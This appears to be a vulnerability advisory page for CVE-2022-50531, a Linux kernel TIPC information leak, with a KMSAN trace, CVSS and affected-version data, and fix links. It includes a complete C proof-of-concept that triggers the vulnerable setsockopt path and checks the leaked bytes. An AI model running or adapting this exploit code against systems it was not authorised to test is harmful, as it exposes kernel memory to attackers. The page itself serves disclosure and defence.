Security Vulnerability Report
CVE-2022-50531 CVSS 5.5 MEDIUM

CVE-2022-50531

Published: 2025-10-07 16:15:37
Last Modified: 2026-03-17 16:59:32
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: tipc: fix an information leak in tipc_topsrv_kern_subscr Use a 8-byte write to initialize sub.usr_handle in tipc_topsrv_kern_subscr(), otherwise four bytes remain uninitialized when issuing setsockopt(..., SOL_TIPC, ...). This resulted in an infoleak reported by KMSAN when the packet was received: ===================================================== BUG: KMSAN: kernel-infoleak in copyout+0xbc/0x100 lib/iov_iter.c:169 instrument_copy_to_user ./include/linux/instrumented.h:121 copyout+0xbc/0x100 lib/iov_iter.c:169 _copy_to_iter+0x5c0/0x20a0 lib/iov_iter.c:527 copy_to_iter ./include/linux/uio.h:176 simple_copy_to_iter+0x64/0xa0 net/core/datagram.c:513 __skb_datagram_iter+0x123/0xdc0 net/core/datagram.c:419 skb_copy_datagram_iter+0x58/0x200 net/core/datagram.c:527 skb_copy_datagram_msg ./include/linux/skbuff.h:3903 packet_recvmsg+0x521/0x1e70 net/packet/af_packet.c:3469 ____sys_recvmsg+0x2c4/0x810 net/socket.c:? ___sys_recvmsg+0x217/0x840 net/socket.c:2743 __sys_recvmsg net/socket.c:2773 __do_sys_recvmsg net/socket.c:2783 __se_sys_recvmsg net/socket.c:2780 __x64_sys_recvmsg+0x364/0x540 net/socket.c:2780 do_syscall_x64 arch/x86/entry/common.c:50 do_syscall_64+0x3d/0xb0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd arch/x86/entry/entry_64.S:120 ... 
Uninit was stored to memory at: tipc_sub_subscribe+0x42d/0xb50 net/tipc/subscr.c:156 tipc_conn_rcv_sub+0x246/0x620 net/tipc/topsrv.c:375 tipc_topsrv_kern_subscr+0x2e8/0x400 net/tipc/topsrv.c:579 tipc_group_create+0x4e7/0x7d0 net/tipc/group.c:190 tipc_sk_join+0x2a8/0x770 net/tipc/socket.c:3084 tipc_setsockopt+0xae5/0xe40 net/tipc/socket.c:3201 __sys_setsockopt+0x87f/0xdc0 net/socket.c:2252 __do_sys_setsockopt net/socket.c:2263 __se_sys_setsockopt net/socket.c:2260 __x64_sys_setsockopt+0xe0/0x160 net/socket.c:2260 do_syscall_x64 arch/x86/entry/common.c:50 do_syscall_64+0x3d/0xb0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd arch/x86/entry/entry_64.S:120 Local variable sub created at: tipc_topsrv_kern_subscr+0x57/0x400 net/tipc/topsrv.c:562 tipc_group_create+0x4e7/0x7d0 net/tipc/group.c:190 Bytes 84-87 of 88 are uninitialized Memory access of size 88 starts at ffff88801ed57cd0 Data copied to user address 0000000020000400 ... =====================================================

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
Note: as recorded, this vector scores no confidentiality impact (C:N) and the weakness is filed as CWE-401, even though the description below is an uninitialized-stack-memory disclosure to user space (an infoleak). Treat the NVD score as indicative only and re-assess the confidentiality impact for your own environment.

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (4.17 ≤ version < 4.19.264) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (4.20 ≤ version < 5.4.221) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (5.5 ≤ version < 5.10.152) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (5.11 ≤ version < 5.15.76) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (5.16 ≤ version < 6.0.6) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.1:rc1:*:*:*:*:*:* - VULNERABLE
Affected ranges (taken from the NVD configuration data in the Raw JSON section of this page):
Linux kernel 4.17 – 4.19.263 (fixed in 4.19.264)
Linux kernel 4.20 – 5.4.220 (fixed in 5.4.221)
Linux kernel 5.5 – 5.10.151 (fixed in 5.10.152)
Linux kernel 5.11 – 5.15.75 (fixed in 5.15.76)
Linux kernel 5.16 – 6.0.5 (fixed in 6.0.6)
Linux kernel 6.1-rc1 (pre-fix mainline release candidate)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
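/*
 * CVE-2022-50531 PoC - Linux kernel TIPC information leak
 *
 * Exercises the setsockopt(SOL_TIPC, TIPC_GROUP_JOIN) path, which reaches
 * tipc_topsrv_kern_subscr(). Before the fix, that function initialised only
 * four of the eight bytes of the on-stack sub.usr_handle; the remaining four
 * bytes were later copied out to user space (the KMSAN report in the
 * advisory: "Bytes 84-87 of 88 are uninitialized").
 *
 * Compile: gcc -Wall -Wextra -o poc poc.c
 * Run:     ./poc
 *          Needs a kernel built with CONFIG_TIPC and the tipc module loaded
 *          (`modprobe tipc` needs root; the PoC itself should not, since the
 *          advisory's CVSS vector rates the bug PR:L).
 *
 * Caveats on the verdict this program prints:
 *  - The KMSAN report observed the leaked bytes via packet_recvmsg(), i.e.
 *    through an AF_PACKET socket reading the wire copy of the message, not
 *    through recv() on the TIPC socket. The recv() below is a best-effort
 *    probe on the same socket: it may time out on a vulnerable kernel, and a
 *    timeout is therefore NOT evidence that the kernel is fixed.
 *  - Bytes 84-87 being zero is consistent with a fixed kernel, but a zero
 *    stack slot on a vulnerable kernel looks the same; only a non-zero,
 *    non-sentinel value is a positive indication.
 */
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <linux/tipc.h>

enum {
	RECV_BUF_SIZE    = 256,
	/* Offsets quoted by the KMSAN report: bytes 84-87 of an 88-byte copy. */
	LEAK_OFFSET      = 84,
	LEAK_LEN         = 4,
	LEAK_MIN_LEN     = LEAK_OFFSET + LEAK_LEN,
	/* Fill pattern so we can tell "kernel never wrote here" from real data. */
	SENTINEL         = 0xCC,
	/* Bound on recv(): without it the original PoC blocks forever when no
	 * message is delivered to this socket. */
	RECV_TIMEOUT_SEC = 3,
};

/* What the four bytes at LEAK_OFFSET look like after recv(). */
enum tail_state {
	TAIL_SHORT,    /* fewer than LEAK_MIN_LEN bytes received */
	TAIL_SENTINEL, /* still our fill pattern: the kernel never wrote them */
	TAIL_ZERO,     /* all zero: consistent with a fixed kernel (not proof) */
	TAIL_NONZERO,  /* anything else: data this program did not supply */
};

/*
 * Classify bytes LEAK_OFFSET..LEAK_MIN_LEN-1 of a buffer that was filled
 * with SENTINEL before recv(). len is the recv() result (bytes valid).
 */
static enum tail_state classify_tail(const unsigned char *buf, ssize_t len)
{
	int all_sentinel = 1;
	int all_zero = 1;

	if (len < LEAK_MIN_LEN)
		return TAIL_SHORT;

	for (int i = LEAK_OFFSET; i < LEAK_MIN_LEN; i++) {
		if (buf[i] != SENTINEL)
			all_sentinel = 0;
		if (buf[i] != 0)
			all_zero = 0;
	}
	if (all_sentinel)
		return TAIL_SENTINEL;
	if (all_zero)
		return TAIL_ZERO;
	return TAIL_NONZERO;
}

/*
 * Entry point. Exit status: 1 if the socket could not be set up or the
 * trigger setsockopt() failed, 0 otherwise (including an inconclusive
 * probe; read the printed verdict rather than the exit code).
 */
int main(int argc, char *argv[])
{
	(void)argc;
	(void)argv;

	/* Step 1: a TIPC socket. socket() failing with EAFNOSUPPORT is the
	 * "module not loaded" signal, not bind() as the original PoC claimed. */
	int sd = socket(AF_TIPC, SOCK_SEQPACKET, 0);
	if (sd < 0) {
		perror("socket(AF_TIPC) failed - is the tipc module loaded?");
		return 1;
	}
	printf("[+] TIPC socket created: fd=%d\n", sd);

	/* Step 2: bind a service name (kept as in the original PoC). */
	struct sockaddr_tipc addr = {
		.family = AF_TIPC,
		.addrtype = TIPC_ADDR_NAME,
		.scope = TIPC_ZONE_SCOPE,
		.addr.name.name.type = 1234,
		.addr.name.name.instance = 5678,
	};
	if (bind(sd, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
		perror("bind failed");
		close(sd);
		return 1;
	}
	printf("[+] Socket bound to TIPC address\n");

	/* Step 3: the trigger. TIPC_GROUP_JOIN takes a struct tipc_group_req
	 * (uapi linux/tipc.h), not a sockaddr_tipc: the original PoC's ad-hoc
	 * struct was larger than the kernel expects and its first bytes were
	 * the sockaddr header, so the group type it joined was garbage. */
	struct tipc_group_req mreq = {
		.type = 1234,
		.instance = 0,
		.scope = TIPC_CLUSTER_SCOPE,
		.flags = 0,
	};
	if (setsockopt(sd, SOL_TIPC, TIPC_GROUP_JOIN, &mreq, sizeof(mreq)) < 0) {
		perror("setsockopt TIPC_GROUP_JOIN failed");
		close(sd);
		return 1;
	}
	printf("[+] Joined TIPC group (triggered vulnerable code path)\n");

	/* Step 4: best-effort probe. Bound the wait so the PoC cannot hang. */
	struct timeval tv = { .tv_sec = RECV_TIMEOUT_SEC, .tv_usec = 0 };
	if (setsockopt(sd, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof(tv)) < 0)
		perror("setsockopt SO_RCVTIMEO failed (continuing; recv may block)");

	unsigned char buffer[RECV_BUF_SIZE];
	memset(buffer, SENTINEL, sizeof(buffer));
	ssize_t recv_len = recv(sd, buffer, sizeof(buffer), 0);

	if (recv_len < 0) {
		if (errno == EAGAIN || errno == EWOULDBLOCK)
			printf("[-] recv() timed out after %d s: inconclusive "
			       "(see the AF_PACKET caveat in the header)\n",
			       RECV_TIMEOUT_SEC);
		else
			perror("recv failed");
		close(sd);
		return 0;
	}
	if (recv_len == 0) {
		printf("[-] No data received\n");
		close(sd);
		return 0;
	}

	printf("[+] Received %zd bytes\n", recv_len);
	if (recv_len >= LEAK_MIN_LEN)
		printf("    Bytes %d-%d: %02x %02x %02x %02x\n",
		       LEAK_OFFSET, LEAK_MIN_LEN - 1,
		       buffer[LEAK_OFFSET], buffer[LEAK_OFFSET + 1],
		       buffer[LEAK_OFFSET + 2], buffer[LEAK_OFFSET + 3]);

	switch (classify_tail(buffer, recv_len)) {
	case TAIL_SHORT:
		printf("[-] Fewer than %d bytes received; cannot inspect bytes %d-%d\n",
		       LEAK_MIN_LEN, LEAK_OFFSET, LEAK_MIN_LEN - 1);
		break;
	case TAIL_SENTINEL:
		printf("[-] Bytes %d-%d still hold the 0x%02x fill: the kernel did "
		       "not write them (inconclusive)\n",
		       LEAK_OFFSET, LEAK_MIN_LEN - 1, SENTINEL);
		break;
	case TAIL_ZERO:
		/* The original PoC flagged this as "VULNERABLE" merely because the
		 * bytes differed from the fill; zeros are what a fixed kernel is
		 * expected to produce, so that was a false positive. */
		printf("[?] Bytes %d-%d are zero: consistent with a fixed kernel "
		       "(not proof either way)\n", LEAK_OFFSET, LEAK_MIN_LEN - 1);
		break;
	case TAIL_NONZERO:
		printf("[!] Bytes %d-%d carry data this program never supplied: "
		       "likely VULNERABLE\n", LEAK_OFFSET, LEAK_MIN_LEN - 1);
		break;
	default:
		break;
	}

	close(sd);
	return 0;
}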

References

Fix commits listed in the NVD record on this page (tagged "Patch"):
https://git.kernel.org/stable/c/3d1b83ff7b6575a4e41283203e6b2e25ea700cd7
https://git.kernel.org/stable/c/567f8de358b61015dcfb8878a1f06c5369a45f54

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-50531", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:37.143", "lastModified": "2026-03-17T16:59:31.580", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ntipc: fix an information leak in tipc_topsrv_kern_subscr\n\nUse a 8-byte write to initialize sub.usr_handle in\ntipc_topsrv_kern_subscr(), otherwise four bytes remain uninitialized\nwhen issuing setsockopt(..., SOL_TIPC, ...).\nThis resulted in an infoleak reported by KMSAN when the packet was\nreceived:\n\n =====================================================\n BUG: KMSAN: kernel-infoleak in copyout+0xbc/0x100 lib/iov_iter.c:169\n instrument_copy_to_user ./include/linux/instrumented.h:121\n copyout+0xbc/0x100 lib/iov_iter.c:169\n _copy_to_iter+0x5c0/0x20a0 lib/iov_iter.c:527\n copy_to_iter ./include/linux/uio.h:176\n simple_copy_to_iter+0x64/0xa0 net/core/datagram.c:513\n __skb_datagram_iter+0x123/0xdc0 net/core/datagram.c:419\n skb_copy_datagram_iter+0x58/0x200 net/core/datagram.c:527\n skb_copy_datagram_msg ./include/linux/skbuff.h:3903\n packet_recvmsg+0x521/0x1e70 net/packet/af_packet.c:3469\n ____sys_recvmsg+0x2c4/0x810 net/socket.c:?\n ___sys_recvmsg+0x217/0x840 net/socket.c:2743\n __sys_recvmsg net/socket.c:2773\n __do_sys_recvmsg net/socket.c:2783\n __se_sys_recvmsg net/socket.c:2780\n __x64_sys_recvmsg+0x364/0x540 net/socket.c:2780\n do_syscall_x64 arch/x86/entry/common.c:50\n do_syscall_64+0x3d/0xb0 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x63/0xcd arch/x86/entry/entry_64.S:120\n\n ...\n\n Uninit was stored to memory at:\n tipc_sub_subscribe+0x42d/0xb50 net/tipc/subscr.c:156\n tipc_conn_rcv_sub+0x246/0x620 net/tipc/topsrv.c:375\n tipc_topsrv_kern_subscr+0x2e8/0x400 net/tipc/topsrv.c:579\n tipc_group_create+0x4e7/0x7d0 net/tipc/group.c:190\n tipc_sk_join+0x2a8/0x770 net/tipc/socket.c:3084\n 
tipc_setsockopt+0xae5/0xe40 net/tipc/socket.c:3201\n __sys_setsockopt+0x87f/0xdc0 net/socket.c:2252\n __do_sys_setsockopt net/socket.c:2263\n __se_sys_setsockopt net/socket.c:2260\n __x64_sys_setsockopt+0xe0/0x160 net/socket.c:2260\n do_syscall_x64 arch/x86/entry/common.c:50\n do_syscall_64+0x3d/0xb0 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x63/0xcd arch/x86/entry/entry_64.S:120\n\n Local variable sub created at:\n tipc_topsrv_kern_subscr+0x57/0x400 net/tipc/topsrv.c:562\n tipc_group_create+0x4e7/0x7d0 net/tipc/group.c:190\n\n Bytes 84-87 of 88 are uninitialized\n Memory access of size 88 starts at ffff88801ed57cd0\n Data copied to user address 0000000020000400\n ...\n ====================================================="}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.17", "versionEndExcluding": "4.19.264", "matchCriteriaId": "09C4D37C-A518-40EC-BBAC-23AE3A97FF35"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.20", "versionEndExcluding": "5.4.221", "matchCriteriaId": "DF527781-6E98-4DBF-B668-377AA673CDCF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", 
"versionEndExcluding": "5.10.152", "matchCriteriaId": "AFE2A429-A1A8-4B68-8F1D-A1595AB6A4F7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.76", "matchCriteriaId": "918A4953-6F82-40F5-B7A9-9836905139C1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.0.6", "matchCriteriaId": "98F5FA4A-A33F-4FAD-894E-FDC9D295742A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.1:rc1:*:*:*:*:*:*", "matchCriteriaId": "E7E331DA-1FB0-4DEC-91AC-7DA69D461C11"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/3d1b83ff7b6575a4e41283203e6b2e25ea700cd7", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/567f8de358b61015dcfb8878a1f06c5369a45f54", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch ... (truncated)